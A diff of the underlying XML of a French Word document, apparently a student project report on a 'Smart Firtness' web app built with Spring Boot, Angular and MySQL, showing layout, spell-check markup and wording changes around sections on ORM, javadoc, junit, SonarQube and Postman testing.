           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="442D5583" id="Flèche : double flèche horizontale 9" o:spid="_x0000_s1026" type="#_x0000_t69" style="position:absolute;margin-left:332.65pt;margin-top:12.3pt;width:52.5pt;height:3.6pt;flip:y;z-index:251675648;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-width-relative:margin;v-text-anchor:middle" o:gfxdata="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" adj="741" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
+              <v:shapetype w14:anchorId="1F868351" id="_x0000_t69" coordsize="21600,21600" o:spt="69" adj="4320,5400" path="m,10800l@0,21600@0@3@2@3@2,21600,21600,10800@2,0@2@1@0@1@0,xe">
+                <v:stroke joinstyle="miter"/>
+                <v:formulas>
+                  <v:f eqn="val #0"/>
+                  <v:f eqn="val #1"/>
+                  <v:f eqn="sum 21600 0 #0"/>
+                  <v:f eqn="sum 21600 0 #1"/>
+                  <v:f eqn="prod #0 #1 10800"/>
+                  <v:f eqn="sum #0 0 @4"/>
+                  <v:f eqn="sum 21600 0 @5"/>
+                </v:formulas>
+                <v:path o:connecttype="custom" o:connectlocs="@2,0;10800,@1;@0,0;0,10800;@0,21600;10800,@3;@2,21600;21600,10800" o:connectangles="270,270,270,180,90,90,90,0" textboxrect="@5,@1,@6,@3"/>
+                <v:handles>
+                  <v:h position="#0,#1" xrange="0,10800" yrange="0,10800"/>
+                </v:handles>
+              </v:shapetype>
+              <v:shape id="Flèche : double flèche horizontale 9" o:spid="_x0000_s1026" type="#_x0000_t69" style="position:absolute;margin-left:332.65pt;margin-top:12.3pt;width:52.5pt;height:3.6pt;flip:y;z-index:251675648;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-width-relative:margin;v-text-anchor:middle" o:gfxdata="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" adj="741" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
             </w:pict>
           </mc:Fallback>
         </mc:AlternateContent>
@@ -2534,111 +3157,85 @@
         </mc:AlternateContent>
       </w:r>
     </w:p>
-    <w:p/>
     <w:p>
       <w:r>
         <w:rPr>
           <w:noProof/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <mc:AlternateContent>
-          <mc:Choice Requires="wps">
-            <w:drawing>
-              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63C93DCD" wp14:editId="3A54D756">
-                <wp:simplePos x="0" y="0"/>
-                <wp:positionH relativeFrom="margin">
-                  <wp:posOffset>4710430</wp:posOffset>
-                </wp:positionH>
-                <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>11430</wp:posOffset>
-                </wp:positionV>
-                <wp:extent cx="1038225" cy="381000"/>
-                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
-                <wp:wrapThrough wrapText="bothSides">
-                  <wp:wrapPolygon edited="0">
-                    <wp:start x="0" y="0"/>
-                    <wp:lineTo x="0" y="20520"/>
-                    <wp:lineTo x="21402" y="20520"/>
-                    <wp:lineTo x="21402" y="0"/>
-                    <wp:lineTo x="0" y="0"/>
-                  </wp:wrapPolygon>
-                </wp:wrapThrough>
-                <wp:docPr id="13" name="Zone de texte 2"/>
-                <wp:cNvGraphicFramePr>
-                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
-                </wp:cNvGraphicFramePr>
-                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
-                    <wps:wsp>
-                      <wps:cNvSpPr txBox="1">
-                        <a:spLocks noChangeArrowheads="1"/>
-                      </wps:cNvSpPr>
-                      <wps:spPr bwMode="auto">
-                        <a:xfrm>
-                          <a:off x="0" y="0"/>
-                          <a:ext cx="1038225" cy="381000"/>
-                        </a:xfrm>
-                        <a:prstGeom prst="rect">
-                          <a:avLst/>
-                        </a:prstGeom>
-                        <a:solidFill>
-                          <a:srgbClr val="FFFFFF"/>
-                        </a:solidFill>
-                        <a:ln w="9525">
-                          <a:noFill/>
-                          <a:miter lim="800000"/>
-                          <a:headEnd/>
-                          <a:tailEnd/>
-                        </a:ln>
-                      </wps:spPr>
-                      <wps:txbx>
-                        <w:txbxContent>
-                          <w:p>
-                            <w:r>
-                              <w:t>Node.js</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:t xml:space="preserve"> (4200)</w:t>
-                            </w:r>
-                          </w:p>
-                        </w:txbxContent>
-                      </wps:txbx>
-                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
-                        <a:noAutofit/>
-                      </wps:bodyPr>
-                    </wps:wsp>
-                  </a:graphicData>
-                </a:graphic>
-                <wp14:sizeRelH relativeFrom="margin">
-                  <wp14:pctWidth>0</wp14:pctWidth>
-                </wp14:sizeRelH>
-                <wp14:sizeRelV relativeFrom="margin">
-                  <wp14:pctHeight>0</wp14:pctHeight>
-                </wp14:sizeRelV>
-              </wp:anchor>
-            </w:drawing>
-          </mc:Choice>
-          <mc:Fallback>
-            <w:pict>
-              <v:shape w14:anchorId="63C93DCD" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:370.9pt;margin-top:.9pt;width:81.75pt;height:30pt;z-index:251681792;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
-                <v:textbox>
-                  <w:txbxContent>
-                    <w:p>
-                      <w:r>
-                        <w:t>Node.js</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:t xml:space="preserve"> (4200)</w:t>
-                      </w:r>
-                    </w:p>
-                  </w:txbxContent>
-                </v:textbox>
-                <w10:wrap type="through" anchorx="margin"/>
-              </v:shape>
-            </w:pict>
-          </mc:Fallback>
-        </mc:AlternateContent>
-      </w:r>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="margin">
+              <wp:posOffset>2585085</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>188595</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="542925" cy="490855"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="4445"/>
+            <wp:wrapThrough wrapText="bothSides">
+              <wp:wrapPolygon edited="0">
+                <wp:start x="0" y="0"/>
+                <wp:lineTo x="0" y="20957"/>
+                <wp:lineTo x="21221" y="20957"/>
+                <wp:lineTo x="21221" y="0"/>
+                <wp:lineTo x="0" y="0"/>
+              </wp:wrapPolygon>
+            </wp:wrapThrough>
+            <wp:docPr id="12" name="Image 12"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 2"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="542925" cy="490855"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="page">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="page">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -2650,10 +3247,10 @@
               <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D89C188" wp14:editId="78D224B1">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="margin">
-                  <wp:posOffset>2128520</wp:posOffset>
+                  <wp:posOffset>1880870</wp:posOffset>
                 </wp:positionH>
                 <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>192405</wp:posOffset>
+                  <wp:posOffset>125730</wp:posOffset>
                 </wp:positionV>
                 <wp:extent cx="2009775" cy="381000"/>
                 <wp:effectExtent l="0" t="0" r="9525" b="0"/>
@@ -2696,14 +3293,7 @@
                       </wps:spPr>
                       <wps:txbx>
                         <w:txbxContent>
-                          <w:p>
-                            <w:r>
-                              <w:t>Spring Boot Application</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:t xml:space="preserve"> (8080)</w:t>
-                            </w:r>
-                          </w:p>
+                          <w:p/>
                         </w:txbxContent>
                       </wps:txbx>
                       <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
@@ -2723,17 +3313,10 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="0D89C188" id="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:167.6pt;margin-top:15.15pt;width:158.25pt;height:30pt;z-index:251677696;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
+              <v:shape w14:anchorId="0D89C188" id="_x0000_s1033" type="#_x0000_t202" style="position:absolute;margin-left:148.1pt;margin-top:9.9pt;width:158.25pt;height:30pt;z-index:251677696;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
                 <v:textbox>
                   <w:txbxContent>
-                    <w:p>
-                      <w:r>
-                        <w:t>Spring Boot Application</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:t xml:space="preserve"> (8080)</w:t>
-                      </w:r>
-                    </w:p>
+                    <w:p/>
                   </w:txbxContent>
                 </v:textbox>
                 <w10:wrap type="through" anchorx="margin"/>
@@ -2742,103 +3325,6 @@
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <mc:AlternateContent>
-          <mc:Choice Requires="wps">
-            <w:drawing>
-              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32E6C4B7" wp14:editId="5A156111">
-                <wp:simplePos x="0" y="0"/>
-                <wp:positionH relativeFrom="margin">
-                  <wp:posOffset>252730</wp:posOffset>
-                </wp:positionH>
-                <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>8255</wp:posOffset>
-                </wp:positionV>
-                <wp:extent cx="647700" cy="381000"/>
-                <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:wrapThrough wrapText="bothSides">
-                  <wp:wrapPolygon edited="0">
-                    <wp:start x="0" y="0"/>
-                    <wp:lineTo x="0" y="20520"/>
-                    <wp:lineTo x="20965" y="20520"/>
-                    <wp:lineTo x="20965" y="0"/>
-                    <wp:lineTo x="0" y="0"/>
-                  </wp:wrapPolygon>
-                </wp:wrapThrough>
-                <wp:docPr id="10" name="Zone de texte 2"/>
-                <wp:cNvGraphicFramePr>
-                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
-                </wp:cNvGraphicFramePr>
-                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
-                    <wps:wsp>
-                      <wps:cNvSpPr txBox="1">
-                        <a:spLocks noChangeArrowheads="1"/>
-                      </wps:cNvSpPr>
-                      <wps:spPr bwMode="auto">
-                        <a:xfrm>
-                          <a:off x="0" y="0"/>
-                          <a:ext cx="647700" cy="381000"/>
-                        </a:xfrm>
-                        <a:prstGeom prst="rect">
-                          <a:avLst/>
-                        </a:prstGeom>
-                        <a:solidFill>
-                          <a:srgbClr val="FFFFFF"/>
-                        </a:solidFill>
-                        <a:ln w="9525">
-                          <a:noFill/>
-                          <a:miter lim="800000"/>
-                          <a:headEnd/>
-                          <a:tailEnd/>
-                        </a:ln>
-                      </wps:spPr>
-                      <wps:txbx>
-                        <w:txbxContent>
-                          <w:p>
-                            <w:r>
-                              <w:t>MySQL</w:t>
-                            </w:r>
-                          </w:p>
-                        </w:txbxContent>
-                      </wps:txbx>
-                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
-                        <a:noAutofit/>
-                      </wps:bodyPr>
-                    </wps:wsp>
-                  </a:graphicData>
-                </a:graphic>
-                <wp14:sizeRelH relativeFrom="margin">
-                  <wp14:pctWidth>0</wp14:pctWidth>
-                </wp14:sizeRelH>
-                <wp14:sizeRelV relativeFrom="margin">
-                  <wp14:pctHeight>0</wp14:pctHeight>
-                </wp14:sizeRelV>
-              </wp:anchor>
-            </w:drawing>
-          </mc:Choice>
-          <mc:Fallback>
-            <w:pict>
-              <v:shape w14:anchorId="32E6C4B7" id="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:19.9pt;margin-top:.65pt;width:51pt;height:30pt;z-index:251678720;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
-                <v:textbox>
-                  <w:txbxContent>
-                    <w:p>
-                      <w:r>
-                        <w:t>MySQL</w:t>
-                      </w:r>
-                    </w:p>
-                  </w:txbxContent>
-                </v:textbox>
-                <w10:wrap type="through" anchorx="margin"/>
-              </v:shape>
-            </w:pict>
-          </mc:Fallback>
-        </mc:AlternateContent>
-      </w:r>
     </w:p>
     <w:p/>
     <w:p/>
@@ -2847,33 +3333,29 @@
         <w:t>Précision : l</w:t>
       </w:r>
       <w:r>
-        <w:t>e concept d’un ORM (Object Relationnal mapping) est d’introduire une couche d’abstraction de toute la partie SQL en connectant le modèle objet de l’application à un modèle relationnel.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Titre2"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="16"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>L</w:t>
-      </w:r>
-      <w:r>
-        <w:t>e</w:t>
-      </w:r>
+        <w:t xml:space="preserve">e concept d’un ORM (Object </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Relationnal</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve">codage des composants </w:t>
-      </w:r>
-      <w:r>
-        <w:t>du projet</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mapping</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>) est d’introduire une couche d’abstraction de toute la partie SQL en connectant le modèle objet de l’application à un modèle relationnel.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre1"/>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:r>
@@ -2910,7 +3392,15 @@
         <w:t xml:space="preserve"> Pour mon projet, j’ai utilisé l</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">’outil javadoc </w:t>
+        <w:t xml:space="preserve">’outil </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>javadoc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">qui </w:t>
@@ -2957,9 +3447,11 @@
       <w:r>
         <w:t xml:space="preserve">Pour mon projet j’ai utilisé </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>junit</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> qui permet d’implémenter des batteries de tests unitaires.</w:t>
       </w:r>
@@ -3000,28 +3492,32 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Effectuer un code Review </w:t>
+        <w:t xml:space="preserve">Effectuer un code </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Review</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:sym w:font="Wingdings" w:char="F0E8"/>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> outre le souci de produire un code de qualité, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">l’intérêt d’une </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">analyse du code </w:t>
-      </w:r>
-      <w:r>
-        <w:t>est d’y trouver d’éventuels bugs et vulnérabilités avant la mise en production de l’application</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> outre le souci de produire un code de qualité, l’intérêt d’une analyse du code est d’y trouver d’éventuels bugs et vulnérabilités avant la mise en production de l’application.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Pour mon projet, j’ai utilisé l’utilitaire </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Sonarqube</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Pour mon projet, j’ai utilisé l’utilitaire Sonarqube.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3100,7 +3596,7 @@
         <w:pStyle w:val="Titre1"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="16"/>
+          <w:numId w:val="4"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -3121,13 +3617,29 @@
         <w:t xml:space="preserve">tests </w:t>
       </w:r>
       <w:r>
-        <w:t>unitaires à l’échelle d’une classe, un jeu d’essai fonctionnel permet de tester les fonctionnalités à l’échelle de l’application. Pour ce faire, j’ai utilisé postman pour élaborer des scénarios d’utilisation correspondant à une fonctionnalité</w:t>
+        <w:t xml:space="preserve">unitaires à l’échelle d’une classe, un jeu d’essai fonctionnel permet de tester les fonctionnalités à l’échelle de l’application. Pour ce faire, j’ai utilisé </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>postman</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> pour élaborer des scénarios d’utilisation correspondant à une fonctionnalité</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> utilisateur (UC). </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Dans le cas de l’application Smart Firtness, la réservation d’un équipement par un utilisateur entraîne </w:t>
+        <w:t xml:space="preserve">Dans le cas de l’application Smart </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Firtness</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, la réservation d’un équipement par un utilisateur entraîne </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">sa non </w:t>
@@ -3167,8 +3679,13 @@
       <w:pPr>
         <w:ind w:firstLine="283"/>
       </w:pPr>
-      <w:r>
-        <w:t>Postman 1</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Postman</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3192,8 +3709,13 @@
       <w:pPr>
         <w:ind w:firstLine="283"/>
       </w:pPr>
-      <w:r>
-        <w:t>Postman 2</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Postman</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 2</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3211,13 +3733,21 @@
       </w:pPr>
     </w:p>
     <w:p/>
-    <w:p/>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="2"/>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Titre1"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="16"/>
+          <w:numId w:val="4"/>
         </w:numPr>
         <w:rPr>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
@@ -3255,9 +3785,29 @@
       <w:r>
         <w:t>(</w:t>
       </w:r>
-      <w:r>
-        <w:t>implements http basic authentication angular</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>implements</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> http basic </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>authentication</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>angular</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">) </w:t>
       </w:r>
@@ -3267,7 +3817,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId7" w:history="1">
+      <w:hyperlink r:id="rId9" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -3282,7 +3832,7 @@
         <w:pStyle w:val="Titre1"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="16"/>
+          <w:numId w:val="4"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -3292,36 +3842,35 @@
     <w:p/>
     <w:p/>
     <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="708"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Parmi les modules disponibles de l’environnement MySQL, MySQL </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-        </w:rPr>
-        <w:t>Workbench</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> intègre des outils de modélisation permettant de générer les modèles logique et physique de l’application. Le modèle logique correspondant à la modélisation sous forme de tables de l’application alors que le modèle physique est la retranscription du modèle logique en requêtes SQL.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
       <w:r>
         <w:rPr>
           <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
         </w:rPr>
-        <w:t>//TO DO</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  Subsctract of (veille)</w:t>
+        <w:t xml:space="preserve">//TO </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
+        </w:rPr>
+        <w:t>DO</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Subsctract</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> of (veille)</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">JWT : </w:t>
       </w:r>
-      <w:hyperlink r:id="rId8" w:history="1">
+      <w:hyperlink r:id="rId10" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -3331,27 +3880,20 @@
       </w:hyperlink>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Paypal : </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId9" w:history="1">
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Paypal</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> : </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId11" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
           </w:rPr>
-          <w:t>https://enngage.g</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Lienhypertexte"/>
-          </w:rPr>
-          <w:t>i</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Lienhypertexte"/>
-          </w:rPr>
-          <w:t>thub.io/ngx-paypal/</w:t>
+          <w:t>https://enngage.github.io/ngx-paypal/</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -3360,8 +3902,13 @@
     <w:p/>
     <w:p/>
     <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Optionnal : </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Optionnal</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> : </w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -3371,7 +3918,7 @@
         <w:autoSpaceDN w:val="0"/>
         <w:spacing w:line="256" w:lineRule="auto"/>
       </w:pPr>
-      <w:hyperlink r:id="rId10" w:history="1">
+      <w:hyperlink r:id="rId12" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -3386,24 +3933,12 @@
         <w:autoSpaceDN w:val="0"/>
         <w:spacing w:line="256" w:lineRule="auto"/>
       </w:pPr>
-      <w:hyperlink r:id="rId11" w:history="1">
+      <w:hyperlink r:id="rId13" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
           </w:rPr>
-          <w:t>https://angular.io</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
